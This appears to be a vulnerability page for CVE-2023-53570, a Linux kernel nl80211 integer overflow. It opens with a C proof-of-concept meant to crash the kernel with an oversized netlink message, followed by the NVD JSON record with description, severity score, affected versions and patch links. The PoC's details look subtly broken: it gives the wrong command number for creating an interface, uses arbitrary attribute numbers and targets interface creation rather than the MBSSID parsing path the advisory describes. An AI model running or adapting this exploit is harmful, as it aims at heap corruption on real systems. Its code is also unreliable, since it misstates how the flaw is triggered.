CVE-2023-53570

/* CVE-2023-53570 PoC - Linux kernel nl80211 integer overflow * This PoC demonstrates the integer overflow in nl80211_parse_mbssid_elems() * by sending a crafted netlink message with >=256 MBSSID elements. * * Requirements: CAP_NET_ADMIN capability * Compile: gcc -o poc poc.c -lnl-3 -lnl-genl-3 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/genetlink.h> #include <netlink/socket.h> #include <netlink/genl/genl.h> #include <netlink/genl/ctrl.h> #define NL80211_GENL_NAME "nl80211" #define NL80211_CMD_NEW_INTERFACE 5 #define NUM_MBSSID_ELEMENTS 300 /* >=256 triggers overflow */ int main(int argc, char *argv[]) { struct nl_sock *sk; struct nl_msg *msg; int err, family; /* Check for CAP_NET_ADMIN */ if (getuid() != 0) { fprintf(stderr, "Requires CAP_NET_ADMIN (run as root or with cap_net_admin)\n"); return 1; } sk = nl_socket_alloc(); if (!sk) { fprintf(stderr, "Failed to allocate netlink socket\n"); return 1; } /* Connect to generic netlink */ if (genl_connect(sk) < 0) { fprintf(stderr, "Failed to connect to generic netlink\n"); nl_socket_free(sk); return 1; } family = genl_ctrl_resolve(sk, NL80211_GENL_NAME); if (family < 0) { fprintf(stderr, "Failed to resolve nl80211 family\n"); nl_socket_free(sk); return 1; } /* Allocate netlink message */ msg = nlmsg_alloc(); if (!msg) { nl_socket_free(sk); return 1; } /* Setup genl header for NL80211_CMD_NEW_INTERFACE */ genlmsg_put(msg, 0, 0, family, 0, 0, NL80211_CMD_NEW_INTERFACE, 0); /* Add interface name attribute */ nla_put_string(msg, 1, "poc%d"); /* Add nested MBSSID attributes with >=256 elements to trigger overflow */ struct nlattr *mbssid_attrs = nla_nest_start(msg, 2); if (mbssid_attrs) { for (int i = 0; i < NUM_MBSSID_ELEMENTS; i++) { /* Each MBSSID element - trigger u8 overflow at 256 */ nla_put(msg, i + 10, 8, "AAAAAAA"); } nla_nest_end(msg, mbssid_attrs); } /* Send the message */ err = nl_send_sync(sk, msg); if (err < 0) { fprintf(stderr, "Failed to send message: %d\n", err); } else { printf("PoC sent successfully. Check kernel for crash/overflow.\n"); } nl_socket_free(sk); return 0; }

{"cve": {"id": "CVE-2023-53570", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.577", "lastModified": "2026-03-21T00:44:15.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: nl80211: fix integer overflow in nl80211_parse_mbssid_elems()\n\nnl80211_parse_mbssid_elems() uses a u8 variable num_elems to count the\nnumber of MBSSID elements in the nested netlink attribute attrs, which can\nlead to an integer overflow if a user of the nl80211 interface specifies\n256 or more elements in the corresponding attribute in userspace. The\ninteger overflow can lead to a heap buffer overflow as num_elems determines\nthe size of the trailing array in elems, and this array is thereafter\nwritten to for each element in attrs.\n\nNote that this vulnerability only affects devices with the\nwiphy->mbssid_max_interfaces member set for the wireless physical device\nstruct in the device driver, and can only be triggered by a process with\nCAP_NET_ADMIN capabilities.\n\nFix this by checking for a maximum of 255 elements in attrs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.46", "matchCriteriaId": "D8B8CC90-9492-465C-81D4-10DA3B712286"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.11", "matchCriteriaId": "C36FD9E6-B6D7-4887-8F08-C1F64E139D5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6311071a056272e1e761de8d0305e87cc566f734", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7d09f9f255a5f78578deba5454923072bb53b16c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e642eb67b8c10dcce758d549cc81564116e0fa49", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}